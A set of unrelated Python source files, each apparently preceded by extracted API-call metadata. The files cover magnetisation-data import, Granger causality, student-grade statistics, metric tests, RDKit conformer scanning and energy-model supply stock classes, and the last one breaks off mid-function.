[((1168, 1180), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (1176, 1180), True, 'import numpy as np\n'), ((1620, 1801), 'numpy.array', 'np.array', (['[0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.1, 0.125, 0.15, 0.2, 0.25, 0.3,\n 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, \n 1.8, 1.9, 2.0]'], {}), '([0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.1, 0.125, 0.15, 0.2, \n 0.25, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5, \n 1.6, 1.7, 1.8, 1.9, 2.0])\n', (1628, 1801), True, 'import numpy as np\n'), ((1839, 2025), 'numpy.array', 'np.array', (['[0.1, 0.15, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.2, 1.4, 1.6, 1.8,\n 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, 12.0, 14.0,\n 16.0, 18.0, 20.0]'], {}), '([0.1, 0.15, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.2, 1.4,\n 1.6, 1.8, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, \n 12.0, 14.0, 16.0, 18.0, 20.0])\n', (1847, 2025), True, 'import numpy as np\n'), ((3282, 3296), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (3294, 3296), True, 'import matplotlib.pyplot as plt\n'), ((3550, 3582), 'pandas.DataFrame', 'pd.DataFrame', ([], {'index': 'J', 'columns': 'd'}), '(index=J, columns=d)\n', (3562, 3582), True, 'import pandas as pd\n'), ((7862, 7876), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (7871, 7876), True, 'import matplotlib.pyplot as plt\n'), ((830, 1031), 'numpy.array', 'np.array', (['[1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.0, 2.2, 2.4, 2.6, 2.8,\n 3.0, 3.2, 3.4, 3.6, 3.8, 4.0, 4.2, 4.4, 4.6, 4.8, 5.0, 5.5, 6.0, 6.5, \n 7.0, 7.5, 8.0, 8.5, 9.0, 9.5, 10.0]'], {}), '([1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.0, 2.2, 2.4, \n 2.6, 2.8, 3.0, 3.2, 3.4, 3.6, 3.8, 4.0, 4.2, 4.4, 4.6, 4.8, 5.0, 5.5, \n 6.0, 6.5, 7.0, 7.5, 8.0, 8.5, 9.0, 9.5, 10.0])\n', (838, 1031), True, 'import numpy as np\n'), ((1108, 1164), 'numpy.array', 'np.array', (['[1.0, 1.5, 2.0, 3.0, 4.0, 5.0, 6.0, 8.0, 10.0]'], {}), '([1.0, 1.5, 2.0, 3.0, 4.0, 5.0, 6.0, 8.0, 10.0])\n', (1116, 1164), True, 'import numpy as np\n'), ((1227, 1258), 'numpy.append', 'np.append', (['res', '(std * 10.0 ** x)'], {}), '(res, std * 10.0 ** x)\n', (1236, 1258), True, 'import numpy as np\n'), ((2744, 2775), 'numpy.sqrt', 'np.sqrt', (['(2 * g * d * (J / 1000))'], {}), '(2 * g * d * (J / 1000))\n', (2751, 2775), True, 'import numpy as np\n'), ((4004, 4024), 'numpy.interp', 'np.interp', (['tv', 'vi', 'J'], {}), '(tv, vi, J)\n', (4013, 4024), True, 'import numpy as np\n'), ((4678, 4705), 'numpy.logspace', 'np.logspace', (['(-1)', '(3)'], {'num': '(500)'}), '(-1, 3, num=500)\n', (4689, 4705), True, 'import numpy as np\n'), ((5310, 5324), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (5322, 5324), True, 'import pandas as pd\n'), ((5498, 5547), 'numpy.interp', 'np.interp', (['td', "data['d'].values", "data['J'].values"], {}), "(td, data['d'].values, data['J'].values)\n", (5507, 5547), True, 'import numpy as np\n'), ((5819, 5831), 'pandas.notna', 'pd.notna', (['tx'], {}), '(tx)\n', (5827, 5831), True, 'import pandas as pd\n'), ((5836, 5848), 'pandas.notna', 'pd.notna', (['ty'], {}), '(ty)\n', (5844, 5848), True, 'import pandas as pd\n'), ((2636, 2667), 'numpy.sqrt', 'np.sqrt', (['(2 * g * (J / 1000) * d)'], {}), '(2 * g * (J / 1000) * d)\n', (2643, 2667), True, 'import numpy as np\n')]
|
from __future__ import division, print_function
import os
import os.path as fs
import numpy as np
import pandas as pd
import re
### PURPOSE: Takes a directory containing N files of the form mXXXXXX.ovf ###
### and imports them to an N x X x Y x Z x 3 numpy array ###
### where X,Y,Z are the number of cells in x,y,z ###
### Files will have the naming convention m*.ovf where * is 6 digit decimal number ###
### eg. 000000, 000001, 000123, etc ###
### So use regex to find something of the form m/<number>*/.ovf ###
def import_dir(path='.', which_files='all', skyrmion=False, core_slice='h', average=True):
#default path is this folder
#which files gives a range of files (default to all in dir)
ls = sorted(os.listdir(path)) #list and sort all files in given path
magnetisation_files=[] #init list of filenames in this dir
for el in ls: #test the regex for magnetisation file format, if found add to filename list
if re.match('m\d*\.ovf' ,el) is not None:
magnetisation_files.append(el)
file_name=fs.join(path, str(magnetisation_files[0])) #creates the filename for the first mag field
data_dimensions=getOvfAttributes(file_name) #gets the file attributes x,y,z nodes (eg 2x2x128)
num_files_to_import=len(magnetisation_files)
if which_files!='all':
print("not importing all files, importing files ",which_files[0], " to ", which_files[1])
num_files_to_import=which_files[1]-which_files[0]
all_mag_data=np.empty((num_files_to_import, data_dimensions[2]), dtype=(float, 3) )
i=0
first_time=True
percentages=[]
for n, fname in enumerate(magnetisation_files):
if which_files!='all':
if n<which_files[0]:
continue
if n>=which_files[1]:
break
if first_time:
print("starting to read ",num_files_to_import," files")
first_time=False
this_filename=fs.join(path, fname)
all_mag_data[i]=importOvfFilePandas(this_filename, data_dimensions, core_slice=core_slice, skyrmion=skyrmion, average_to_1D=average)
if i/num_files_to_import*100%10<0.2:
if np.floor(i*100/num_files_to_import) not in percentages:
print(np.floor(i*100.0/num_files_to_import),"% done")
percentages.append(np.floor(i*100/num_files_to_import))
i+=1
#print data_array.shape
print("100% done!")
print("read ",i," files")
return all_mag_data
def getOvfAttributes(filename):
if filename[-4:]!='.ovf': #if filetype is not ovf, exit with error code 1
print("FATAL ERROR, NOT AN OVF FILE")
return -1
f=open(filename, 'r')
j=0
for line in f:
if re.match('.*Binary.*', line) is not None: #if the data type is a binary, just exit with error code -2
print("FATAL ERROR: BINARY NOT SUPPORTED")
return -2
if j==20:
x_nodes=int(line[10:])
if j==21:
y_nodes=int(line[10:])
if j==22:
z_nodes=int(line[10:])
break
#print (str(j)+'\t'+str(line))
j+=1
f.close()
return(x_nodes, y_nodes, z_nodes)
# takes filename, imports ovf as pandas dataframe, takes data dimensions in (x,y,z) nodes format
def importOvfFilePandas(this_filename, data_dims, average_to_1D=False, skyrmion=False, core_slice='h'):
ave_axis=None
raw_data=pd.read_csv(this_filename, header=None, skiprows=28, skipfooter=2, delimiter="\s+")
magnetisation_array=np.reshape(raw_data.as_matrix(), np.append(data_dims[::-1],3))
if skyrmion:
m1=int(data_dims[1]/2-1)
m2=int(data_dims[1]/2+1)
if core_slice=='h':
magnetisation_array=magnetisation_array[:,m1:m2,:]
ave_axis=1
elif core_slice=='v':
magnetisation_array=magnetisation_array[:,:,m1:m2]
ave_axis=2
if average_to_1D:
magnetisation_array=np.mean(magnetisation_array, axis=ave_axis)
magnetisation_array=np.mean(magnetisation_array, axis=0)
elif average_to_1D:
for i in [1,2]:
magnetisation_array=np.mean(magnetisation_array, axis=1)
#print(magnetisation_array.shape)
return magnetisation_array
if __name__=="__main__":
#test=importOvfFilePandas('/home/michael/Desktop/Honours/MuMax3/DataProcessing/SkyrmionData/ovfimporttest/m000035.ovf', (128,128,1), skyrmion=True, h_core_slice=True, average_to_1D=True)
test=import_dir('/home/michael/Desktop/Honours/MuMax3/DataProcessing/HelicoidData/helicoidv8_mid.out/')
#test=importOvfFilePandas('/home/michael/Desktop/Honours/MuMax3/DataProcessing/SkyrmionData/ovfimporttest/m000035.ovf', (128,128,1), skyrmion=True, v_core_slice=True, average_to_1D=True)
#test=importOvfFilePandas('/home/michael/Desktop/Honours/MuMax3/DataProcessing/HelicoidData/helicoidv6.out/m000035.ovf', (2,2,128), average_to_1D=True)
|
[
"numpy.mean",
"os.listdir",
"pandas.read_csv",
"os.path.join",
"re.match",
"numpy.floor",
"numpy.append",
"numpy.empty"
] |
[((1449, 1518), 'numpy.empty', 'np.empty', (['(num_files_to_import, data_dimensions[2])'], {'dtype': '(float, 3)'}), '((num_files_to_import, data_dimensions[2]), dtype=(float, 3))\n', (1457, 1518), True, 'import numpy as np\n'), ((3116, 3204), 'pandas.read_csv', 'pd.read_csv', (['this_filename'], {'header': 'None', 'skiprows': '(28)', 'skipfooter': '(2)', 'delimiter': '"""\\\\s+"""'}), "(this_filename, header=None, skiprows=28, skipfooter=2,\n delimiter='\\\\s+')\n", (3127, 3204), True, 'import pandas as pd\n'), ((730, 746), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (740, 746), False, 'import os\n'), ((1817, 1837), 'os.path.join', 'fs.join', (['path', 'fname'], {}), '(path, fname)\n', (1824, 1837), True, 'import os.path as fs\n'), ((3254, 3283), 'numpy.append', 'np.append', (['data_dims[::-1]', '(3)'], {}), '(data_dims[::-1], 3)\n', (3263, 3283), True, 'import numpy as np\n'), ((945, 972), 're.match', 're.match', (['"""m\\\\d*\\\\.ovf"""', 'el'], {}), "('m\\\\d*\\\\.ovf', el)\n", (953, 972), False, 'import re\n'), ((2514, 2542), 're.match', 're.match', (['""".*Binary.*"""', 'line'], {}), "('.*Binary.*', line)\n", (2522, 2542), False, 'import re\n'), ((3583, 3626), 'numpy.mean', 'np.mean', (['magnetisation_array'], {'axis': 'ave_axis'}), '(magnetisation_array, axis=ave_axis)\n', (3590, 3626), True, 'import numpy as np\n'), ((3650, 3686), 'numpy.mean', 'np.mean', (['magnetisation_array'], {'axis': '(0)'}), '(magnetisation_array, axis=0)\n', (3657, 3686), True, 'import numpy as np\n'), ((2022, 2061), 'numpy.floor', 'np.floor', (['(i * 100 / num_files_to_import)'], {}), '(i * 100 / num_files_to_import)\n', (2030, 2061), True, 'import numpy as np\n'), ((3750, 3786), 'numpy.mean', 'np.mean', (['magnetisation_array'], {'axis': '(1)'}), '(magnetisation_array, axis=1)\n', (3757, 3786), True, 'import numpy as np\n'), ((2088, 2129), 'numpy.floor', 'np.floor', (['(i * 100.0 / num_files_to_import)'], {}), '(i * 100.0 / num_files_to_import)\n', (2096, 2129), True, 'import numpy as np\n'), ((2160, 2199), 'numpy.floor', 'np.floor', (['(i * 100 / num_files_to_import)'], {}), '(i * 100 / num_files_to_import)\n', (2168, 2199), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
#
# Implementation of Granger-Geweke causality
#
#
# Builtin/3rd party package imports
import numpy as np
def granger(CSD, Hfunc, Sigma):
"""
Computes the pairwise Granger-Geweke causalities
for all (non-symmetric!) channel combinations
according to Equation 8 in [1]_.
The transfer functions `Hfunc` and noise covariance
`Sigma` are expected to have been already computed.
Parameters
----------
CSD : (nFreq, N, N) :class:`numpy.ndarray`
Complex cross spectra for all channel combinations ``i,j``
`N` corresponds to number of input channels.
Hfunc : (nFreq, N, N) :class:`numpy.ndarray`
Spectral transfer functions for all channel combinations ``i,j``
Sigma : (N, N) :class:`numpy.ndarray`
The noise covariances
Returns
-------
Granger : (nFreq, N, N) :class:`numpy.ndarray`
Spectral Granger-Geweke causality between all channel
combinations. Directionality follows array
notation: causality from ``i -> j`` is ``Granger[:,i,j]``,
causality from ``j -> i`` is ``Granger[:,j,i]``
See also
--------
wilson_sf : :func:`~syncopy.connectivity.wilson_sf.wilson_sf
Spectral matrix factorization that yields the
transfer functions and noise covariances
from a cross spectral density.
Notes
-----
.. [1] Dhamala, Mukeshwar, <NAME>, and <NAME>.
"Estimating Granger causality from Fourier and wavelet transforms
of time series data." Physical review letters 100.1 (2008): 018701.
"""
nChannels = CSD.shape[1]
auto_spectra = CSD.transpose(1, 2, 0).diagonal()
auto_spectra = np.abs(auto_spectra) # auto-spectra are real
# we need the stacked auto-spectra of the form (nChannel=3):
# S_11 S_22 S_33
# Smat(f) = S_11 S_22 S_33
# S_11 S_22 S_33
Smat = auto_spectra[:, None, :] * np.ones(nChannels)[:, None]
# Granger i->j needs H_ji entry
Hmat = np.abs(Hfunc.transpose(0, 2, 1))**2
# Granger i->j needs Sigma_ji entry
SigmaJI = np.abs(Sigma.T)
# imag part should be 0
auto_cov = np.abs(Sigma.diagonal())
# same stacking as for the auto spectra (without freq axis)
SigmaII = auto_cov[None, :] * np.ones(nChannels)[:, None]
# the denominator
denom = SigmaII.T - SigmaJI**2 / SigmaII
denom = Smat - denom * Hmat
# linear causality i -> j
Granger = np.log(Smat / denom)
return Granger
|
[
"numpy.abs",
"numpy.log",
"numpy.ones"
] |
[((1711, 1731), 'numpy.abs', 'np.abs', (['auto_spectra'], {}), '(auto_spectra)\n', (1717, 1731), True, 'import numpy as np\n'), ((2119, 2134), 'numpy.abs', 'np.abs', (['Sigma.T'], {}), '(Sigma.T)\n', (2125, 2134), True, 'import numpy as np\n'), ((2475, 2495), 'numpy.log', 'np.log', (['(Smat / denom)'], {}), '(Smat / denom)\n', (2481, 2495), True, 'import numpy as np\n'), ((1953, 1971), 'numpy.ones', 'np.ones', (['nChannels'], {}), '(nChannels)\n', (1960, 1971), True, 'import numpy as np\n'), ((2302, 2320), 'numpy.ones', 'np.ones', (['nChannels'], {}), '(nChannels)\n', (2309, 2320), True, 'import numpy as np\n')]
|
# Matplotlib
# 파이썬 데이터과학 관련 시각화 페키지
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
#%matplotlib inline # 주피터 노트북에서 show() 호출없이도
# 그래프를 그릴수 있게 해 줌
# data = np.arange(10)
# plt.plot(data)
# plt.show()
# 산점도 - 100의 표준정규분포 난수 생성
list = []
for i in range(100): # 0 ~ 99
x = np.random.normal(0,1) # 표준정규분포 난수
y = x + 0.1 + 0.2 + np.random.normal(0,1)
list.append([x, y])
print(list)
x_data = [ v[0] for v in list ] # v= [x, ]
y_data = [ v[1] for v in list ] # v= [, y]
plt.plot(x_data, y_data, 'ro')
plt.show()
# 성적데이터 읽어오기
df = pd.read_excel('c:/Java/sungjuk.xlsx')
#총점, 평균 계산후 df 에 추가
subj = ['국어', '영어', '수학', '과학']
df['총점'] = df[subj].sum(axis=1)
df['평균'] = df['총점'] / len(subj)
df.sort_values(['평균'], ascending=[False]) # 평균으로 정렬
import matplotlib as mpl
mpl.rc('font', family='Malgun Gothic') # 그래프 한글 설정
sj = df.sort_values(['평균'], ascending=[False])
sj.index = sj['이름']
sj['평균'].plot(kind='bar', figsize=(8,4))
# 성적 비교 - 어느 반이 잘했나?
ban1 = df[df['반'] == 1]
ban2 = df[df['반'] == 2]
ban1_mean = ban1['총점'].sum() / (6 * 4)
ban2_mean = ban2['총점'].sum() / (6 * 4)
print(ban1_mean, ban2_mean) # 79.042 vs 77.125
# 두집단 간의 평균운 유의미하게 차이 나는것인가? (t검증)
# p-value 값이 0.005 이하일때 - 차이가 난다고 할 수 있음
import scipy.stats as stats
result = stats.ttest_ind(ban1['평균'], ban2['평균'])
print(result) # pvalue=0.755583336185639
# 그럼, 과목별 평균은 차이가 나는가? (t검증)
for sub in subj:
print(sub, stats.ttest_ind(ban1[sub], ban2[sub]))
# 국어 pvalue=0.031982494983816424
# 영어 pvalue=0.5518533781528807
# 수학 pvalue=0.1654958420079056
# 과학 pvalue=0.0014931977711732465
# 전체 성적데이터에 대한 그래프 출력
sj[subj].plot(kind='bar', figsize=(10,6))
# 과목별 점수 분포 - 박스수염 그래프 작성
df[subj].boxplot(return_type='axes')
# 일반, 이반 과목별 점수 분포
ban1[subj].boxplot(return_type='axes') # 일반
ban2[subj].boxplot(return_type='axes') # 이반
# 과목별 상관관계 - '수학:과학' 와 '국어:영어'
df.plot(kind='scatter', x='수학', y='과학')
print( stats.pearsonr( df['수학'], df['과학'] ) ) # 피어슨 상관계수
# 0.5632890597067751(상관계수), 0.05650580486155532(p검증값)
# 과목별 상관관계 - '수학:과학' 와 '국어:영어'
df.plot(kind='scatter', x='국어', y='영어')
print( stats.pearsonr( df['국어'], df['영어'] ) ) # 피어슨 상관계수
# 0.10566562777973997(상관계수), 0.7437959551857836(p검증값)
|
[
"numpy.random.normal",
"scipy.stats.pearsonr",
"matplotlib.pyplot.plot",
"scipy.stats.ttest_ind",
"matplotlib.rc",
"pandas.read_excel",
"matplotlib.pyplot.show"
] |
[((550, 580), 'matplotlib.pyplot.plot', 'plt.plot', (['x_data', 'y_data', '"""ro"""'], {}), "(x_data, y_data, 'ro')\n", (558, 580), True, 'import matplotlib.pyplot as plt\n'), ((582, 592), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (590, 592), True, 'import matplotlib.pyplot as plt\n'), ((617, 654), 'pandas.read_excel', 'pd.read_excel', (['"""c:/Java/sungjuk.xlsx"""'], {}), "('c:/Java/sungjuk.xlsx')\n", (630, 654), True, 'import pandas as pd\n'), ((861, 899), 'matplotlib.rc', 'mpl.rc', (['"""font"""'], {'family': '"""Malgun Gothic"""'}), "('font', family='Malgun Gothic')\n", (867, 899), True, 'import matplotlib as mpl\n'), ((1348, 1387), 'scipy.stats.ttest_ind', 'stats.ttest_ind', (["ban1['평균']", "ban2['평균']"], {}), "(ban1['평균'], ban2['평균'])\n", (1363, 1387), True, 'import scipy.stats as stats\n'), ((334, 356), 'numpy.random.normal', 'np.random.normal', (['(0)', '(1)'], {}), '(0, 1)\n', (350, 356), True, 'import numpy as np\n'), ((2004, 2038), 'scipy.stats.pearsonr', 'stats.pearsonr', (["df['수학']", "df['과학']"], {}), "(df['수학'], df['과학'])\n", (2018, 2038), True, 'import scipy.stats as stats\n'), ((2192, 2226), 'scipy.stats.pearsonr', 'stats.pearsonr', (["df['국어']", "df['영어']"], {}), "(df['국어'], df['영어'])\n", (2206, 2226), True, 'import scipy.stats as stats\n'), ((393, 415), 'numpy.random.normal', 'np.random.normal', (['(0)', '(1)'], {}), '(0, 1)\n', (409, 415), True, 'import numpy as np\n'), ((1498, 1535), 'scipy.stats.ttest_ind', 'stats.ttest_ind', (['ban1[sub]', 'ban2[sub]'], {}), '(ban1[sub], ban2[sub])\n', (1513, 1535), True, 'import scipy.stats as stats\n')]
|
# -*- coding: utf-8 -*-
import unittest
import numpy as np
import torch
from comet.metrics import RegressionReport, WMTKendall
class TestMetrics(unittest.TestCase):
def test_regression_report(self):
report = RegressionReport()
a = np.array([0, 0, 0, 1, 1, 1, 1])
b = np.arange(7)
expected = {
"pearson": torch.tensor(0.8660254, dtype=torch.float32),
"kendall": torch.tensor(0.7559289, dtype=torch.float32),
"spearman": torch.tensor(0.866025, dtype=torch.float32),
}
result = report.compute(a, b)
self.assertDictEqual(
{k: round(v.item(), 4) for k, v in result.items()},
{k: round(v.item(), 4) for k, v in expected.items()},
)
def test_wmt_kendall(self):
metric = WMTKendall()
pos = torch.tensor([0, 0.5, 1])
neg = torch.tensor([1, 0.5, 0])
expected = (1 - 2) / (1 + 2)
self.assertEqual(metric.compute(pos, neg), expected)
|
[
"comet.metrics.RegressionReport",
"numpy.array",
"torch.tensor",
"comet.metrics.WMTKendall",
"numpy.arange"
] |
[((224, 242), 'comet.metrics.RegressionReport', 'RegressionReport', ([], {}), '()\n', (240, 242), False, 'from comet.metrics import RegressionReport, WMTKendall\n'), ((255, 286), 'numpy.array', 'np.array', (['[0, 0, 0, 1, 1, 1, 1]'], {}), '([0, 0, 0, 1, 1, 1, 1])\n', (263, 286), True, 'import numpy as np\n'), ((299, 311), 'numpy.arange', 'np.arange', (['(7)'], {}), '(7)\n', (308, 311), True, 'import numpy as np\n'), ((808, 820), 'comet.metrics.WMTKendall', 'WMTKendall', ([], {}), '()\n', (818, 820), False, 'from comet.metrics import RegressionReport, WMTKendall\n'), ((836, 861), 'torch.tensor', 'torch.tensor', (['[0, 0.5, 1]'], {}), '([0, 0.5, 1])\n', (848, 861), False, 'import torch\n'), ((876, 901), 'torch.tensor', 'torch.tensor', (['[1, 0.5, 0]'], {}), '([1, 0.5, 0])\n', (888, 901), False, 'import torch\n'), ((356, 400), 'torch.tensor', 'torch.tensor', (['(0.8660254)'], {'dtype': 'torch.float32'}), '(0.8660254, dtype=torch.float32)\n', (368, 400), False, 'import torch\n'), ((425, 469), 'torch.tensor', 'torch.tensor', (['(0.7559289)'], {'dtype': 'torch.float32'}), '(0.7559289, dtype=torch.float32)\n', (437, 469), False, 'import torch\n'), ((495, 538), 'torch.tensor', 'torch.tensor', (['(0.866025)'], {'dtype': 'torch.float32'}), '(0.866025, dtype=torch.float32)\n', (507, 538), False, 'import torch\n')]
|
#!/usr/bin/env python
from redis import Redis
import uuid
import sys
import os
import subprocess
import shutil
import numpy as np
import itertools as it
import json
from rdkit import Chem
from rdkit.Chem import AllChem, ChemicalForceFields
redis = Redis.from_url("redis://" + os.environ.get("EXECUTOR_CONSTR", "127.0.0.1:6379/0"))
ENERGY_THRESHOLD = 1e-4
ANGLE_DELTA = 1e-7
FF_RELAX_STEPS = 50
def clockwork(resolution):
if resolution == 0:
start = 0
step = 360
n_steps = 1
else:
start = 360.0 / 2.0 ** (resolution)
step = 360.0 / 2.0 ** (resolution-1)
n_steps = 2 ** (resolution - 1)
return start, step, n_steps
def get_classical_constrained_geometry(sdfstr, torsions, molname, dihedrals, angles):
mol = Chem.MolFromMolBlock(sdfstr, removeHs=False)
ffprop = ChemicalForceFields.MMFFGetMoleculeProperties(mol)
ffc = ChemicalForceFields.MMFFGetMoleculeForceField(mol, ffprop)
conformer = mol.GetConformer()
# Set angles and constrains for all torsions
for dih_id, angle in zip(dihedrals, angles):
# Set clockwork angle
try: Chem.rdMolTransforms.SetDihedralDeg(conformer, *torsions[dih_id], float(angle))
except: pass
# Set forcefield constrain
ffc.MMFFAddTorsionConstraint(*torsions[dih_id], False, angle-ANGLE_DELTA, angle+ANGLE_DELTA, 1.0e10)
# reduce bad contacts
try:
ffc.Minimize(maxIts=FF_RELAX_STEPS, energyTol=1e-2, forceTol=1e-3)
except RuntimeError:
pass
atoms = [atom.GetSymbol() for atom in mol.GetAtoms()]
coordinates = conformer.GetPositions()
return f'{len(atoms)}\n\n' + '\n'.join([f'{element} {coords[0]} {coords[1]} {coords[2]}' for element, coords in zip(atoms, coordinates)])
def do_workpackage(molname, dihedrals, resolution):
ndih = len(dihedrals)
start, step, n_steps = clockwork(resolution)
scanangles = np.arange(start, start+step*n_steps, step)
# fetch input
sdfstr = redis.get(f'clockwork:{molname}:sdf').decode("ascii")
torsions = json.loads(redis.get(f'clockwork:{molname}:dihedrals').decode("ascii"))
accepted_geometries = []
accepted_energies = []
for angles in it.product(scanangles, repeat=ndih):
xyzfile = get_classical_constrained_geometry(sdfstr, torsions, molname, dihedrals, angles)
print (xyzfile)
#optxyzfile, energy, bonds = get_xtb_geoopt(xyzfile)
#if set(bonds) != set(refbonds):
# continue
#for i in range(len(accepted_energies)):
# if abs(accepted_energies[i] - energy) < ENERGY_THRESHOLD:
# # compare geometries optxyzfile vs accepted_geometries
#else:
# accepted_energies.append(energy)
# accepted_geometries.append(optxyzfile)
results = {}
results['mol'] = molname
results['ndih'] = ndih
results['res'] = resolution
results['geometries'] = accepted_geometries
results['energies'] = accepted_energies
return json.dumps(results)
do_workpackage("debug", (1, 2, 3), 2)
|
[
"rdkit.Chem.MolFromMolBlock",
"itertools.product",
"json.dumps",
"os.environ.get",
"rdkit.Chem.ChemicalForceFields.MMFFGetMoleculeForceField",
"rdkit.Chem.ChemicalForceFields.MMFFGetMoleculeProperties",
"numpy.arange"
] |
[((760, 804), 'rdkit.Chem.MolFromMolBlock', 'Chem.MolFromMolBlock', (['sdfstr'], {'removeHs': '(False)'}), '(sdfstr, removeHs=False)\n', (780, 804), False, 'from rdkit import Chem\n'), ((818, 868), 'rdkit.Chem.ChemicalForceFields.MMFFGetMoleculeProperties', 'ChemicalForceFields.MMFFGetMoleculeProperties', (['mol'], {}), '(mol)\n', (863, 868), False, 'from rdkit.Chem import AllChem, ChemicalForceFields\n'), ((877, 935), 'rdkit.Chem.ChemicalForceFields.MMFFGetMoleculeForceField', 'ChemicalForceFields.MMFFGetMoleculeForceField', (['mol', 'ffprop'], {}), '(mol, ffprop)\n', (922, 935), False, 'from rdkit.Chem import AllChem, ChemicalForceFields\n'), ((1846, 1892), 'numpy.arange', 'np.arange', (['start', '(start + step * n_steps)', 'step'], {}), '(start, start + step * n_steps, step)\n', (1855, 1892), True, 'import numpy as np\n'), ((2127, 2162), 'itertools.product', 'it.product', (['scanangles'], {'repeat': 'ndih'}), '(scanangles, repeat=ndih)\n', (2137, 2162), True, 'import itertools as it\n'), ((2842, 2861), 'json.dumps', 'json.dumps', (['results'], {}), '(results)\n', (2852, 2861), False, 'import json\n'), ((294, 347), 'os.environ.get', 'os.environ.get', (['"""EXECUTOR_CONSTR"""', '"""127.0.0.1:6379/0"""'], {}), "('EXECUTOR_CONSTR', '127.0.0.1:6379/0')\n", (308, 347), False, 'import os\n')]
|
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 17 09:36:07 2015
@author: Ben
"""
from shared_classes import Stock, StockItem, SpecifiedStock
from datamapfunctions import DataMapFunctions, Abstract
import util
import numpy as np
import config as cfg
class SupplyStock(Stock, StockItem):
def __init__(self, id, drivers, sql_id_table='SupplyStock', sql_data_table='SupplyStockData',
primary_key='node_id', **kwargs):
Stock.__init__(self, id, drivers, sql_id_table='SupplyStock', sql_data_table='SupplyStockData',
primary_key='node_id', **kwargs)
StockItem.__init__(self)
def return_stock_slice(self, elements):
group = self.specified.loc[elements].transpose()
return group
class SupplySales(Abstract, DataMapFunctions):
def __init__(self, id, supply_node_id, sql_id_table, sql_data_table, primary_key, data_id_key, reference=False, scenario=None):
self.id = id
self.input_type = 'total'
self.supply_node_id = supply_node_id
self.sql_id_table = sql_id_table
self.sql_data_table = sql_data_table
self.scenario = scenario
self.mapped = False
if reference:
for col, att in util.object_att_from_table(self.sql_id_table, self.supply_node_id, primary_key):
setattr(self, col, att)
DataMapFunctions.__init__(self, data_id_key)
self.read_timeseries_data(supply_node_id=self.supply_node_id)
self.raw_values = util.remove_df_levels(self.raw_values, 'supply_technology')
else:
# measure specific sales does not require technology filtering
Abstract.__init__(self, self.id, primary_key=primary_key, data_id_key=data_id_key)
def calculate(self, vintages, years, interpolation_method=None, extrapolation_method=None):
self.vintages = vintages
self.years = years
self.remap(time_index_name='vintage',fill_timeseries=True, interpolation_method=interpolation_method, extrapolation_method=extrapolation_method, fill_value=np.nan)
self.convert()
def convert(self):
model_energy_unit = cfg.calculation_energy_unit
model_time_step = cfg.cfgfile.get('case', 'time_step')
if self.time_unit is not None:
# if sales has a time_unit, then the unit is energy and must be converted to capacity
self.values = util.unit_convert(self.values, unit_from_num=self.capacity_or_energy_unit,
unit_from_den=self.time_unit, unit_to_num=model_energy_unit,
unit_to_den=model_time_step)
else:
# if sales is a capacity unit, the model must convert the unit type to an energy unit for conversion ()
self.values = util.unit_convert(self.values, unit_from_num=cfg.ureg.Quantity(self.capacity_or_energy_unit)
* cfg.ureg.Quantity(model_time_step),
unit_from_den=model_time_step,
unit_to_num=model_energy_unit,
unit_to_den=model_time_step)
def reconcile_with_stock_levels(self, needed_sales_share_levels, needed_sales_names):
if not set(needed_sales_names).issubset(self.values.index.names):
# we can't have more specificity in sales share than in stock
raise ValueError('Sales share expressed as an intensity cannot have levels not in stock')
# pick up extra levels
self.values = util.expand_multi(self.values, needed_sales_share_levels,
needed_sales_names).sort_index()
class SupplySalesShare(Abstract, DataMapFunctions):
def __init__(self, id, supply_node_id, sql_id_table, sql_data_table, primary_key, data_id_key, reference=False, scenario=None):
self.id = id
self.supply_node_id = supply_node_id
self.sql_id_table = sql_id_table
self.sql_data_table = sql_data_table
self.scenario = scenario
self.mapped = False
self.input_type = 'intensity'
if reference:
for col, att in util.object_att_from_table(self.sql_id_table, self.supply_node_id, primary_key):
if att is not None:
setattr(self, col, att)
DataMapFunctions.__init__(self, data_id_key)
self.read_timeseries_data(supply_node_id=self.supply_node_id)
self.raw_values = util.remove_df_levels(self.raw_values, ['supply_node', 'supply_technology'])
else:
# measure specific sales share does not require technology filtering
Abstract.__init__(self, self.id, primary_key=primary_key, data_id_key=data_id_key)
def calculate(self, vintages, years):
self.vintages = vintages
self.years = years
self.remap(time_index_name='vintage')
def reconcile_with_stock_levels(self, needed_sales_share_levels, needed_sales_share_names):
if self.input_type == 'intensity':
if not set(self.values.index.names).issubset(needed_sales_share_names):
# we can't have more specificity in sales share than in stock
raise ValueError('Sales share expressed as an intensity cannot have levels not in stock')
# pick up extra levels
self.values = util.expand_multi(self.values, needed_sales_share_levels,
needed_sales_share_names).sort_index()
self.values.fillna(0, inplace=True)
elif self.input_type == 'total':
raise ValueError(
'A sales share type of total is not currently supported. Please normalize to sales share as a percentage')
# if not set(sales_share.values.index.names).issubset(stock.values.index.names):
# we have extra salesshare levels and we need to do a groupby sum
# sales_share.values = sales_share.values.groupby(level=needed_sales_share_levels).sum()
# todo: add logic here so that if stock and service demand
# has more specificity than sales share, we raise an exception
@staticmethod
def scale_reference_array_to_gap(ss_array, space_for_reference):
num_years, num_techs, num_techs = np.shape(ss_array)
